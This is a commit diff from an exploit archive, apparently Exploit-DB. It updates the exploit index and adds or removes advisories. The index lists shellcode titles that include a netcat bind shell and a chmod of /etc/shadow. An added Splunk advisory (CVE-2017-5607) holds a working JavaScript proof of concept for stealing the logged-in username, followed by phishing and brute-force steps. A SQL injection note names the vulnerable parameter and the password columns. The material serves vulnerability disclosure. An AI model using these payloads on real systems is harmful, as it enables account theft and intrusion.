41719,platforms/hardware/remote/41719.rb,"NETGEAR WNR2000v5 - (Un)authenticated hidden_lang_avi Stack Overflow (Metasploit)",2017-03-24,Metasploit,hardware,remote,80
41720,platforms/python/remote/41720.rb,"Logsign 4.4.2 / 4.4.137 - Remote Command Injection (Metasploit)",2017-03-24,Metasploit,python,remote,0
41738,platforms/windows/remote/41738.py,"Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41738,platforms/windows/remote/41738.py,"Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Buffer Overflow",2017-03-27,"Zhiniang Peng and Chen Wu",windows,remote,0
41740,platforms/multiple/remote/41740.txt,"Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory",2017-03-27,"Google Security Research",multiple,remote,0
41744,platforms/linux/remote/41744.rb,"Github Enterprise - Default Session Secret And Deserialization (Metasploit)",2017-03-27,Metasploit,linux,remote,8443
41751,platforms/windows/remote/41751.txt,"DzSoft PHP Editor 4.2.7 - File Enumeration",2017-03-28,hyp3rlinx,windows,remote,0
@ -15750,7 +15750,7 @@ id,file,description,date,author,platform,type,port
13645,platforms/windows/shellcode/13645.c,"Windows - JITed egg-hunter stage-0 Shellcode",2010-03-20,"Alexey Sintsov",windows,shellcode,0
13647,platforms/win_x86/shellcode/13647.txt,"Win32/XP SP3 (RU) - WinExec+ExitProcess cmd Shellcode (12 bytes)",2010-03-24,"lord Kelvin",win_x86,shellcode,0
13648,platforms/win_x86/shellcode/13648.rb,"Win32 - MessageBox Shellcode (Metasploit)",2010-03-24,corelanc0d3r,win_x86,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/Windows 7 - JITed egg-hunter stage-0 Shellcode Adjusted universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13649,platforms/windows/shellcode/13649.txt,"Windows XP/Vista/7 - JITed egg-hunter stage-0 Shellcode Adjusted Universal",2010-03-27,"Alexey Sintsov",windows,shellcode,0
13661,platforms/lin_x86/shellcode/13661.txt,"Linux/x86 - nc -lvve/bin/sh -p13377 Shellcode",2010-04-02,anonymous,lin_x86,shellcode,0
13669,platforms/lin_x86/shellcode/13669.c,"Linux/x86 - chmod(_/etc/shadow__ 0666) Shellcode (36 bytes)",2010-04-14,Magnefikko,lin_x86,shellcode,0
13670,platforms/lin_x86-64/shellcode/13670.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (25 bytes)",2010-04-14,Magnefikko,lin_x86-64,shellcode,0
@ -22790,7 +22790,7 @@ id,file,description,date,author,platform,type,port
11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0
11616,platforms/php/webapps/11616.txt,"My Little Forum - contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
11619,platforms/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps,0
11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0
11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0
11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,cr4wl3r,php,webapps,0
11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 - SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0
11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0
@ -33267,7 +33267,6 @@ id,file,description,date,author,platform,type,port
33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 - '_SESSION[dede_admin_id]' Parameter Authentication Bypass",2010-03-01,"Wolves Security Team",php,webapps,0
33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0
33688,platforms/php/webapps/33688.txt,"Discuz! 6.0 - 'uid' Parameter Cross-Site Scripting",2010-03-02,"lis cker",php,webapps,0
33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0
33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation - 'error_msg_parameter' Cross-Site Scripting",2010-03-04,thebluegenius,jsp,webapps,0
33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0
@ -37675,3 +37674,5 @@ id,file,description,date,author,platform,type,port
41749,platforms/php/webapps/41749.txt,"inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation",2017-03-27,"Tim Herres",php,webapps,0
41758,platforms/php/webapps/41758.txt,"Opensource Classified Ads Script - 'keyword' Parameter SQL Injection",2017-03-29,"Ihsan Sencan",php,webapps,0
41774,platforms/php/webapps/41774.py,"EyesOfNetwork (EON) 5.1 - SQL Injection",2017-03-29,"Dany Bach",php,webapps,0
41779,platforms/multiple/webapps/41779.txt,"Splunk Enterprise - Information Disclosure",2017-03-31,hyp3rlinx,multiple,webapps,0
41780,platforms/php/webapps/41780.txt,"Membership Formula - 'order' Parameter SQL Injection",2017-03-31,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

142
platforms/multiple/webapps/41779.txt Executable file
View file

@ -0,0 +1,142 @@
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt
[+] ISR: ApparitionSec
Vendor:
===============
www.splunk.com
Product:
==================
Splunk Enterprise
Splunk provides the leading platform for Operational Intelligence. Customers use Splunk to search, monitor, analyze
and visualize machine data. Splunk Enterprise, collects and analyzes high volumes of machine-generated data.
Vulnerability Type:
==================================
Javascript (JSON) Information Theft
CVE Reference:
==============
CVE-2017-5607
Security Issue:
================
Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage.
Some useful data gained is the currently logged in username and if remote user setting is enabled. After, the username
can be use to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.
Root cause is the global Window JS variable assignment of config?autoload=1 '$C'.
e.g.
window.$C = {"BUILD_NUMBER": 207789, "SPLUNKD_PATH"... etc... }
To steal information we simply can define a function to be called when the '$C' JS property is "set" on webpage, for example.
Object.defineProperty( Object.prototype, "$C", { set:function(val){...
The Object prototype is a Object that every other object inherits from in JavaScript, if we create a setter on the name of our target
in this case "$C", we can get/steal the value of this data, in this case it is very easy as it is assigned to global Window namespace.
Affected Splunk Enterprise versions:
6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2
Vulnerability could allow a remote attacker to obtain logged-in username and Splunk version-related information via JavaScript.
References:
=============
https://www.splunk.com/view/SP-CAAAPZ3
https://www.splunk.com/view/SP-CAAAPZ3#InformationLeakageviaJavaScriptCVE20175607
Exploit/POC:
=============
Reproduction:
1) Log into Splunk
2) place the below Javascript in webpage on another server.
"Splunk-Data-Theft.html"
<script>
Object.defineProperty( Object.prototype, "$C", { set:function(val){
//prompt("Splunk Timed out:\nPlease Login to Splunk\nUsername: "+val.USERNAME, "Password")
for(var i in val){
alert(""+i+" "+val[i]);
}
}
});
</script>
<script src="https://VICTIM-IP:8000/en-US/config?autoload=1"></script>
3) Visit the server hosting the "Splunk-Data-Theft.html" webpage, grab current authenticated user
4) Phish or brute force the application.
Video POC URL:
===============
https://vimeo.com/210634562
Network Access:
===============
Remote
Impact:
=======================
Information Disclosure
Severity:
=========
Medium
Disclosure Timeline:
===================================================
Vendor Notification: November 30, 2016
Vendor Acknowledgement: December 2, 2016
Vendor Release Splunk 6.5.3 / Patch : March 30, 2017
March 31, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

10
platforms/php/webapps/33690.txt
View file

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/38527/info
DosyaYukle Scripti is prone to a remote file-upload vulnerability because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit this issue to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DosyaYukle Scripti 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/dosyayukle/
http://www.example.com/dosyayukle/dosyalar/ch99.php

24
platforms/php/webapps/41780.txt Executable file
View file

@ -0,0 +1,24 @@
# # # # #
# Exploit Title: Membership Formula - Best Membership Site PHP Script - SQL Injection
# Google Dork: N/A
# Date: 31.03.2017
# Vendor Homepage: http://www.zeescripts.com/
# Software: http://www.zeescripts.com/store/membership-formula-v1.0-best-membership-site-php-script.html
# Demo: http://www.zeemember.com/demo/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/members/member.area.directory.php?order=[SQL]
# members:id
# members:first_name
# members:last_name
# members:email
# members:password
# # # # #

2
platforms/win_x86-64/local/41722.c
View file

@ -4,7 +4,7 @@ Check these out:
- https://labs.mwrinfosecurity.com/blog/a-tale-of-bitmaps/
Tested on:
- Windows 10 Pro x64 (Post-Anniversary)
- hal.dll: 10.0.10240.16384
- ntoskrnl: 10.0.14393.693
- FortiShield.sys: 5.2.3.633
Thanks to master @ryujin and @ronin for helping out. And thanks to Morten (@Blomster81) for the MiGetPteAddress :D
*/